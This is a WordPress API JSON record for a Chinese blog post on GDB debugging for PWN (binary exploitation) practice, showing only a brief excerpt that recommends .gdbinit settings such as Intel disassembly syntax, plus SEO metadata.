GDB\u8c03\u8bd5\u6280\u5de7\u4e0e\u63d2\u4ef6\u589e\u5f3a\u5b9e\u6218<br \/>\n\u4f5c\u4e3aPWN\u5b9e\u6218\u4e2d\u6700\u6838\u5fc3\u7684\u8c03\u8bd5\u5de5\u5177&#xff0c;GDB\u7684\u91cd\u8981\u6027\u600e\u4e48\u5f3a\u8c03\u90fd\u4e0d\u4e3a\u8fc7\u3002\u8bb0\u5f97\u6211\u521a\u5165\u95e8\u65f6&#xff0c;\u9762\u5bf9\u9ed1\u4e4e\u4e4e\u7684\u547d\u4ee4\u884c\u754c\u9762\u4e5f\u662f\u4e00\u5934\u96fe\u6c34&#xff0c;\u4f46\u638c\u63e1\u51e0\u4e2a\u5173\u952e\u6280\u5de7\u540e&#xff0c;\u8c03\u8bd5\u6548\u7387\u76f4\u63a5\u7ffb\u500d\u3002<br \/>\n\u9996\u5148\u5f3a\u70c8\u5efa\u8bae\u914d\u7f6e\u597d.gdbinit\u6587\u4ef6&#xff0c;\u8fd9\u4e2a\u5c0f\u5c0f\u7684\u521d\u59cb\u5316\u6587\u4ef6\u80fd\u6781\u5927\u63d0\u5347\u8c03\u8bd5\u4f53\u9a8c\u3002\u6211\u7684\u914d\u7f6e\u901a\u5e38\u5305\u542b\u8fd9\u4e9b\u5185\u5bb9&#xff1a;<br \/>\nset disassembly-flavor intel<br \/>\nset pagination of<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[7837,7838,7839,5230],"topic":[],"class_list":["post-74192","post","type-post","status-publish","format-standard","hentry","category-server","tag-pwn","tag-pwntools","tag-rop","tag-gdb"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v20.3 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>PWN \u5b9e\u6218\u5fc5\u5907\u5de5\u5177\u94fe\u4e0e\u9ad8\u6548\u8c03\u8bd5\u6280\u5de7 - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.wsisp.com\/helps\/74192.html\" \/>\n<meta property=\"og:locale\" content=\"zh_CN\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"PWN \u5b9e\u6218\u5fc5\u5907\u5de5\u5177\u94fe\u4e0e\u9ad8\u6548\u8c03\u8bd5\u6280\u5de7 - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3\" \/>\n<meta property=\"og:description\" content=\"1. GDB\u8c03\u8bd5\u6280\u5de7\u4e0e\u63d2\u4ef6\u589e\u5f3a\u5b9e\u6218 \u4f5c\u4e3aPWN\u5b9e\u6218\u4e2d\u6700\u6838\u5fc3\u7684\u8c03\u8bd5\u5de5\u5177&#xff0c;GDB\u7684\u91cd\u8981\u6027\u600e\u4e48\u5f3a\u8c03\u90fd\u4e0d\u4e3a\u8fc7\u3002\u8bb0\u5f97\u6211\u521a\u5165\u95e8\u65f6&#xff0c;\u9762\u5bf9\u9ed1\u4e4e\u4e4e\u7684\u547d\u4ee4\u884c\u754c\u9762\u4e5f\u662f\u4e00\u5934\u96fe\u6c34&#xff0c;\u4f46\u638c\u63e1\u51e0\u4e2a\u5173\u952e\u6280\u5de7\u540e&#xff0c;\u8c03\u8bd5\u6548\u7387\u76f4\u63a5\u7ffb\u500d\u3002 \u9996\u5148\u5f3a\u70c8\u5efa\u8bae\u914d\u7f6e\u597d.gdbinit\u6587\u4ef6&#xff0c;\u8fd9\u4e2a\u5c0f\u5c0f\u7684\u521d\u59cb\u5316\u6587\u4ef6\u80fd\u6781\u5927\u63d0\u5347\u8c03\u8bd5\u4f53\u9a8c\u3002\u6211\u7684\u914d\u7f6e\u901a\u5e38\u5305\u542b\u8fd9\u4e9b\u5185\u5bb9&#xff1a; set disassembly-flavor intel set pagination of\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.wsisp.com\/helps\/74192.html\" \/>\n<meta property=\"og:site_name\" content=\"\u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-09T02:25:27+00:00\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u4f5c\u8005\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u9884\u8ba1\u9605\u8bfb\u65f6\u95f4\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 \u5206\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.wsisp.com\/helps\/74192.html\",\"url\":\"https:\/\/www.wsisp.com\/helps\/74192.html\",\"name\":\"PWN \u5b9e\u6218\u5fc5\u5907\u5de5\u5177\u94fe\u4e0e\u9ad8\u6548\u8c03\u8bd5\u6280\u5de7 - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3\",\"isPartOf\":{\"@id\":\"https:\/\/www.wsisp.com\/helps\/#website\"},\"datePublished\":\"2026-02-09T02:25:27+00:00\",\"dateModified\":\"2026-02-09T02:25:27+00:00\",\"author\":{\"@id\":\"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/358e386c577a3ab51c4493330a20ad41\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.wsisp.com\/helps\/74192.html#breadcrumb\"},\"inLanguage\":\"zh-Hans\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.wsisp.com\/helps\/74192.html\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.wsisp.com\/helps\/74192.html#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"\u9996\u9875\",\"item\":\"https:\/\/www.wsisp.com\/helps\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"PWN \u5b9e\u6218\u5fc5\u5907\u5de5\u5177\u94fe\u4e0e\u9ad8\u6548\u8c03\u8bd5\u6280\u5de7\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.wsisp.com\/helps\/#website\",\"url\":\"https:\/\/www.wsisp.com\/helps\/\",\"name\":\"\u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3\",\"description\":\"\u9999\u6e2f\u670d\u52a1\u5668_\u9999\u6e2f\u4e91\u670d\u52a1\u5668\u8d44\u8baf_\u670d\u52a1\u5668\u5e2e\u52a9\u6587\u6863_\u670d\u52a1\u5668\u6559\u7a0b\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.wsisp.com\/helps\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"zh-Hans\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/358e386c577a3ab51c4493330a20ad41\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-Hans\",\"@id\":\"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/gravatar.wp-china-yes.net\/avatar\/?s=96&d=mystery\",\"contentUrl\":\"https:\/\/gravatar.wp-china-yes.net\/avatar\/?s=96&d=mystery\",\"caption\":\"admin\"},\"sameAs\":[\"http:\/\/wp.wsisp.com\"],\"url\":\"https:\/\/www.wsisp.com\/helps\/author\/admin\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"PWN \u5b9e\u6218\u5fc5\u5907\u5de5\u5177\u94fe\u4e0e\u9ad8\u6548\u8c03\u8bd5\u6280\u5de7 - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.wsisp.com\/helps\/74192.html","og_locale":"zh_CN","og_type":"article","og_title":"PWN \u5b9e\u6218\u5fc5\u5907\u5de5\u5177\u94fe\u4e0e\u9ad8\u6548\u8c03\u8bd5\u6280\u5de7 - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3","og_description":"1. GDB\u8c03\u8bd5\u6280\u5de7\u4e0e\u63d2\u4ef6\u589e\u5f3a\u5b9e\u6218 \u4f5c\u4e3aPWN\u5b9e\u6218\u4e2d\u6700\u6838\u5fc3\u7684\u8c03\u8bd5\u5de5\u5177&#xff0c;GDB\u7684\u91cd\u8981\u6027\u600e\u4e48\u5f3a\u8c03\u90fd\u4e0d\u4e3a\u8fc7\u3002\u8bb0\u5f97\u6211\u521a\u5165\u95e8\u65f6&#xff0c;\u9762\u5bf9\u9ed1\u4e4e\u4e4e\u7684\u547d\u4ee4\u884c\u754c\u9762\u4e5f\u662f\u4e00\u5934\u96fe\u6c34&#xff0c;\u4f46\u638c\u63e1\u51e0\u4e2a\u5173\u952e\u6280\u5de7\u540e&#xff0c;\u8c03\u8bd5\u6548\u7387\u76f4\u63a5\u7ffb\u500d\u3002 \u9996\u5148\u5f3a\u70c8\u5efa\u8bae\u914d\u7f6e\u597d.gdbinit\u6587\u4ef6&#xff0c;\u8fd9\u4e2a\u5c0f\u5c0f\u7684\u521d\u59cb\u5316\u6587\u4ef6\u80fd\u6781\u5927\u63d0\u5347\u8c03\u8bd5\u4f53\u9a8c\u3002\u6211\u7684\u914d\u7f6e\u901a\u5e38\u5305\u542b\u8fd9\u4e9b\u5185\u5bb9&#xff1a; set disassembly-flavor intel set pagination of","og_url":"https:\/\/www.wsisp.com\/helps\/74192.html","og_site_name":"\u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3","article_published_time":"2026-02-09T02:25:27+00:00","author":"admin","twitter_card":"summary_large_image","twitter_misc":{"\u4f5c\u8005":"admin","\u9884\u8ba1\u9605\u8bfb\u65f6\u95f4":"3 \u5206"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.wsisp.com\/helps\/74192.html","url":"https:\/\/www.wsisp.com\/helps\/74192.html","name":"PWN \u5b9e\u6218\u5fc5\u5907\u5de5\u5177\u94fe\u4e0e\u9ad8\u6548\u8c03\u8bd5\u6280\u5de7 - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3","isPartOf":{"@id":"https:\/\/www.wsisp.com\/helps\/#website"},"datePublished":"2026-02-09T02:25:27+00:00","dateModified":"2026-02-09T02:25:27+00:00","author":{"@id":"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/358e386c577a3ab51c4493330a20ad41"},"breadcrumb":{"@id":"https:\/\/www.wsisp.com\/helps\/74192.html#breadcrumb"},"inLanguage":"zh-Hans","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.wsisp.com\/helps\/74192.html"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.wsisp.com\/helps\/74192.html#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"\u9996\u9875","item":"https:\/\/www.wsisp.com\/helps"},{"@type":"ListItem","position":2,"name":"PWN \u5b9e\u6218\u5fc5\u5907\u5de5\u5177\u94fe\u4e0e\u9ad8\u6548\u8c03\u8bd5\u6280\u5de7"}]},{"@type":"WebSite","@id":"https:\/\/www.wsisp.com\/helps\/#website","url":"https:\/\/www.wsisp.com\/helps\/","name":"\u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3","description":"\u9999\u6e2f\u670d\u52a1\u5668_\u9999\u6e2f\u4e91\u670d\u52a1\u5668\u8d44\u8baf_\u670d\u52a1\u5668\u5e2e\u52a9\u6587\u6863_\u670d\u52a1\u5668\u6559\u7a0b","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.wsisp.com\/helps\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"zh-Hans"},{"@type":"Person","@id":"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/358e386c577a3ab51c4493330a20ad41","name":"admin","image":{"@type":"ImageObject","inLanguage":"zh-Hans","@id":"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/image\/","url":"https:\/\/gravatar.wp-china-yes.net\/avatar\/?s=96&d=mystery","contentUrl":"https:\/\/gravatar.wp-china-yes.net\/avatar\/?s=96&d=mystery","caption":"admin"},"sameAs":["http:\/\/wp.wsisp.com"],"url":"https:\/\/www.wsisp.com\/helps\/author\/admin"}]}},"_links":{"self":[{"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/posts\/74192","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/comments?post=74192"}],"version-history":[{"count":0,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/posts\/74192\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/media?parent=74192"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/categories?post=74192"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/tags?post=74192"},{"taxonomy":"topic","embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/topic?post=74192"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}